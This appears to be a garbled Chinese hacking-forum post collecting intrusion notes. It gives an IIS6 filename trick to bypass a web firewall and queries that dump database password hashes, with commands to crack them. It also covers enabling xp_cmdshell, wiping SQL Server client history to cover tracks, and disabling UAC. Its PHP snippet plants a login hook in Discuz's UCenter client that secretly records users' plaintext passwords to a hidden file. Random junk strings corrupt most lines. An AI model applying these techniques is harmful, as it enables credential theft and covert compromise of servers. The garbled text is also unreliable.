7 V. ?0 y, Y$ T. @. W& Y在它下面直接插入即可,记录的密码生成在pwd.txt中,8 J0 @& d- b% I, q; {
其实修改wp-login.php不是个好办法。容易被发现,还有其他的方法的,做个记录
m$ }. E+ z" A! J! T利用II6文件解析漏洞绕过安全狗代码:
/ D3 y( l) ?; M5 p1 u;antian365.asp;antian365.jpg b, n1 A1 p* {0 N' q8 }
% M- W' ~2 f2 c& p1 `( Z6 v各种类型数据库抓HASH破解最高权限密码!/ z+ Z2 ~; t( G8 w. B
1.sql server2000+ b& f4 v% Y. T( b& u. R3 D
SELECT password from master.dbo.sysxlogins where name='sa'
. R+ l# Y+ v7 R) m+ K# r1 z8 V- R& g0×010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED250341
$ f. p* s) n& ~- _( Y2FD54D6119FFF04129A1D72E7C3194F7284A7F3A Q7 T( o$ g- n; N% s
1 R. ?" H( F, G+ Y2 t8 Z
0×0100- constant header
" Q! T0 x' p' H, S: R* z) ~34767D5C- salt" C5 `, ]& B5 L6 t L# z8 L
0CFA5FDCA28C4A56085E65E882E71CB0ED250341- case senstive hash( h. {; C. A$ Q/ ^
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A- upper case hash
, X) K. S* I% Ecrack the upper case hash in ‘cain and abel’ and then work the case sentive hash
1 ^( f9 N+ Z" GSQL server 2005:-" @: ]3 o' E; J$ ~+ @& }; f
SELECT password_hash FROM sys.sql_logins where name='sa'2 D( Q/ q6 `) F$ y- a1 U0 R
0×0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F
+ m5 ^; B8 P' K/ I: S" K9 C0×0100- constant header3 B0 `9 b1 q- p9 p
993BF231-salt0 ~2 ]7 C# Z: H" Z1 S& w6 I b6 a
5F36CC441485B35C4D84687DC02C78B0E680411F- case sensitive hash
- e: T+ i k0 N6 F' wcrack case sensitive hash in cain, try brute force and dictionary based attacks.) W/ ?; U; L7 c
# o; @& f3 [# m8 aupdate:- following bernardo’s comments:-
. h0 U* h) e/ `$ @. S/ |2 P4 X5 quse function fn_varbintohexstr() to cast password in a hex string.
/ ^. i" u3 u1 `7 ~6 W8 `, `e.g. select name from sysxlogins union all select master.dbo.fn_varbintohexstr(password)from sysxlogins
$ P3 f, A8 ~9 ~. T, L9 S
+ s9 K- t [" `9 i* Z# \4 _5 d1 {MYSQL:-
. l( Q6 {8 O2 A! @) V0 l5 H9 A, u1 l0 B6 U& e
In MySQL you can generate hashes internally using the password(), md5(), or sha1 functions. password() is the function used for MySQL’s own user authentication system. It returns a 16-byte string for MySQL versions prior to 4.1, and a 41-byte string (based on a double SHA-1 hash) for versions 4.1 and up. md5() is available from MySQL version 3.23.2 and sha1() was added later in 4.0.2.3 G. c: d, B1 i. t" U
h' `$ ]2 X1 t' V1 \( ~. U*mysql < 4.1; |9 E" @) p" G; B1 n6 | A5 K/ r
: ~2 ~0 v5 a0 W- Fmysql> SELECT PASSWORD(‘mypass’);2 W9 Y) C! M$ a; R$ ?. S
+——————–+
& e) _3 Y+ q. }) N: J| PASSWORD(‘mypass’) |
, q% A5 ]- d- y+——————–+9 ^ G, T1 A. G& K4 Z
| 6f8c114b58f2ce9e |4 z) g, L3 m; @ d5 U# Y F+ R0 K
+——————–+
/ m$ I4 s7 M' s. i! E! v2 N {3 ~* }. d; u
*mysql >=4.1& B& `; d6 E$ X
8 ]# ` ^% W* |0 U/ F1 ~. F" Cmysql> SELECT PASSWORD(‘mypass’);) C6 @5 W! D/ f5 u
+——————————————-+
# D3 i: x# Q: u( k| PASSWORD(‘mypass’) |
( ~& _$ p7 o& X# Q B U! m+——————————————-+
1 d( V2 |+ P' c }1 Q: r' L( v3 N" h| *6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4 |7 f3 m% `5 w4 i/ @9 z
+——————————————-+0 Q8 n5 c+ Z' u6 z5 e( E# v
. }5 X2 N7 y. I* V( o/ USelect user, password from mysql.user
; z' U1 P( G# O/ u6 YThe hashes can be cracked in ‘cain and abel’# d+ v# n! k& \3 y; }3 |5 p8 c
$ ?9 z) W: k! T3 i4 w! _8 A
Postgres:-" Y& c2 _: T% N
Postgres keeps MD5-based password hashes for database-level users in the pg_shadow table. You need to be the database superuser to read this table (usually called “postgres” or “pgsql”)% k$ b2 Q1 q# j. N$ ?# \+ r/ V
select usename, passwd from pg_shadow;
3 J% k% ^+ W3 B" s' m2 e8 `usename | passwd3 }6 ^( k, b, d% t$ a
——————+————————————-
- C# o6 X0 u" p. N% L5 q" D' o7 B) Gtestuser | md5fabb6d7172aadfda4753bf0507ed43963 Y, l/ T) K+ N3 U/ _. o; T' a
use mdcrack to crack these hashes:-/ O9 N3 ~+ b! d; D' W
$ wine MDCrack-sse.exe –algorithm=MD5 –append=testuser fabb6d7172aadfda4753bf0507ed43967 {4 |$ a! P6 E% A- ]
( O. i2 n' i' G- @ o
Oracle:-
2 B; q" s9 h: g( _select name, password, spare4 from sys.user$7 I# y" N# N2 T1 U, X
hashes could be cracked using ‘cain and abel’ or thc-orakelcrackert11g
' E8 V% i% D: N: F% y; ^More on Oracle later, i am a bit bored….0 h% \; n6 w" \$ J, P5 L6 y$ f
4 ^; C6 f8 D/ y
/ J* q. \: ~6 k7 P在sql server2005/2008中开启xp_cmdshell
T4 Z [1 K X8 w `1 a: Q: T-- To allow advanced options to be changed. ` w% S% d. S- f5 |( ]+ `
EXEC sp_configure 'show advanced options', 1
* W, A2 ~+ L/ J! t" VGO, ?. ^( v' u" T* d/ v) p& d; Z
-- To update the currently configured value for advanced options.
) R+ ]( n: [; mRECONFIGURE7 g; @% a3 g7 y' g8 W0 p( g0 d
GO; m' {7 ^ |5 _7 C! w7 S
-- To enable the feature./ k* v Y) l- B" j9 Z( D6 t8 ^
EXEC sp_configure 'xp_cmdshell', 1
q3 r* V% G1 H- d. K! @' [( yGO
6 t7 y' m9 [4 [0 V) M9 w8 V# K/ ^-- To update the currently configured value for this feature.
- G- Y* S6 p; J% K. p5 r# xRECONFIGURE
4 Q9 n! \- o' M5 z; O+ aGO
$ G# X7 h4 H1 A/ H; _' b5 ]SQL 2008 server日志清除,在清楚前一定要备份。
, G5 p- Q& g4 W: V. W如果Windows Server 2008 标准版安装SQL Express 2008,则在这里删除:
* A& Z' }" W( }8 p k! ^6 Y$ qX:\Users[SomeUser]\AppData\Roaming\Microsoft\Microsoft SQL Server\100\Tools\Shell\SqlStudio.bin
6 Z2 q6 y/ W" ^" o% `8 ~" n* w, x' F8 c$ F" I' f E
对于SQL Server 2008以前的版本:
7 I6 ^1 P( D3 ^$ H8 D# X9 }5 X! lSQL Server 2005:4 p; b1 h' j- V! p( _8 e9 Y
删除X:\Documents and Settings\XXX\Application Data\Microsoft\Microsoft SQL Server\90\Tools\Shell\mru.dat
# ~2 L* y3 Z4 t0 ], [9 pSQL Server 2000:
# q6 I2 z O7 \8 `: {1 G, U9 h清除注册表HKEY_CURRENT_USER\Software\Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers\相应的内容即可。
6 N3 _% D6 W. L4 b E" u3 ?0 B: ~# Q/ R4 \5 W: z( _
本帖最后由 simeon 于 2013-1-3 09:51 编辑
1 D" `6 @+ N: O! ^: [8 D% J. M0 e7 b3 j4 l1 `
0 b4 q2 Z- O1 @5 T3 @6 ^9 vwindows 2008 文件权限修改
( r0 Q+ r5 y$ [' |1.http://technet.microsoft.com/zh- ... 4%28v=ws.10%29.aspx& H) O8 m C8 R. z+ I
2.http://hi.baidu.com/xiaobei713/item/b0cfae38f6bd278df5e4ad98
8 |' I( X' h( M9 Z* j$ R8 w一、先在右键菜单里面看看有没有“管理员取得所有权”,没有“管理员取得所有权”,
7 X* d1 S( [/ V( \; G* @8 h2 z- P" o- r
Windows Registry Editor Version 5.00' C0 z+ a8 q, Z: _
[HKEY_CLASSES_ROOT\*\shell\runas] O% H9 _9 y, @% i: C/ m# f7 }
@="管理员取得所有权"; z/ j" j2 |! A5 m) B: e' q
"NoWorkingDirectory"=""
& {# ~ |, c3 g) X! a0 K! C) C4 l0 y[HKEY_CLASSES_ROOT\*\shell\runas\command]* m+ u8 K" I( y7 ?! C. S
@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"0 I% W |8 T5 U0 P9 a: w( f$ ]
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
4 X$ N2 ^: e0 Y. P[HKEY_CLASSES_ROOT\exefile\shell\runas2]( i& A4 r- N# t6 j$ r* G
@="管理员取得所有权"
4 R7 }8 D# l* Q"NoWorkingDirectory"=""8 j( J. s8 M( N2 P
[HKEY_CLASSES_ROOT\exefile\shell\runas2\command]
# [, a2 m: ]2 ^* m@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"' Z* Z1 F4 I. b% c. i. @6 ]
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"3 f% u6 W. b. f3 B* d
; S7 K! N% }$ e$ D5 f0 U
[HKEY_CLASSES_ROOT\Directory\shell\runas]
9 F) ?- z5 |& u) \1 ?- x+ J@="管理员取得所有权"& a2 G8 C) C' f! o2 }
"NoWorkingDirectory"=""# S1 F6 x( j: T& M+ c. _9 ?. e
[HKEY_CLASSES_ROOT\Directory\shell\runas\command]
! p7 a7 Q$ C. ?@="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t", k8 |9 ^' x. n! R0 J9 f, H9 \! e
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"
, I) B; [; b( [* I7 p6 I$ w1 E# c
8 w! U% J6 V! r# \# d6 X3 N, t! u) S
win7右键“管理员取得所有权”.reg导入
( G" s8 F, \! v( e7 O二、在C:\Windows目录里下搜索“notepad.exe”文件,应该会搜索到四个“notepad.exe”和四个“notepad.exe.mui”,6 P# B3 g: d0 {: q
1、C:\Windows这个路径的“notepad.exe”不需要替换
( K0 r# o- i9 W/ {4 W3 D) @7 E' h2、C:\Windows\System32这个路径的“notepad.exe”不需要替换; ^9 `6 {3 u6 ~) Q6 P1 L
3、四个“notepad.exe.mui”不要管" T' h0 h- x' x- r3 N
4、主要替换C:\Windows\winsxs\x86_microsoft-windows-notepad_31bf3856ad364e35_6.1.7600.16385_none_6ef0e39ed15350e4和
+ g" z9 y" R, x( e& f, F5 _9 jC:\Windows\winsxs\x86_microsoft-windows-notepadwin_31bf3856ad364e35_6.1.7600.16385_none_42a023025c60a33a两个文件下的“notepad.exe”
% Z4 p' O j/ D' |; N: X替换方法先取得这两个文件夹的管理员权限,然后把“Notepad2.exe”重命名为“notepad.exe”替换到这两个文件夹下面,* w, W8 U& l2 d2 _7 C) a7 L
替换完之后回到桌面,新建一个txt文档打开看看是不是变了。
* o, Y: }/ W/ H1 H& _- C N+ iwindows 2008中关闭安全策略:
3 P" \+ G# M5 m( N5 X f1 Wreg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f% m0 u6 @. |7 z1 F) b5 Y; O/ P7 h2 I
修改uc_client目录下的client.php 在2 C& ~% Y" L+ E: a' A; R: @
function uc_user_login($username, $password, $isuid = 0, $checkques = 0, $questionid = '', $answer = '') {( G0 u0 s5 A. k0 o) u$ h
下加入如上代码,在网站./data/cache/目录下自动生成csslog.php
8 ~4 V2 r! A. s# s, @你可以在ipdata目录下添加 view.php 可以用来查看记录的,密码为:falw) {4 X4 |" C- I" p: Q( D3 G a/ R
if(getenv('HTTP_CLIENT_IP')) {
* z* e7 H! E; Z! p* u# {8 l$onlineip = getenv('HTTP_CLIENT_IP');
) W5 i% b2 P" V# b} elseif(getenv('HTTP_X_FORWARDED_FOR')) {' `1 Z( Z' W+ K" K: n/ {' Z; ^
$onlineip = getenv('HTTP_X_FORWARDED_FOR');5 p, |2 N. o" _# J- l+ D
} elseif(getenv('REMOTE_ADDR')) {
1 V! F/ @- W. k$onlineip = getenv('REMOTE_ADDR');8 E( C) O1 c8 l0 [
} else {) Y' T5 d I: K p
$onlineip = $HTTP_SERVER_VARS['REMOTE_ADDR'];
6 }# l6 m% S+ g' K3 r$ x- N}
9 f9 Q: ^# { W $showtime=date("Y-m-d H:i:s"); ` }; U2 S J1 ~% z9 b5 Z
$record="<?exit();?>用户:".$username." 密码:".$password." IP:".$onlineip." Time:".$showtime."\r\n";
: s8 |4 T8 A. ], e3 @- M7 u. `& S- K $handle=fopen('./data/cache/csslog.php','a+');
2 m+ u5 ^) R, T5 r1 G $write=fwrite($handle,$record); |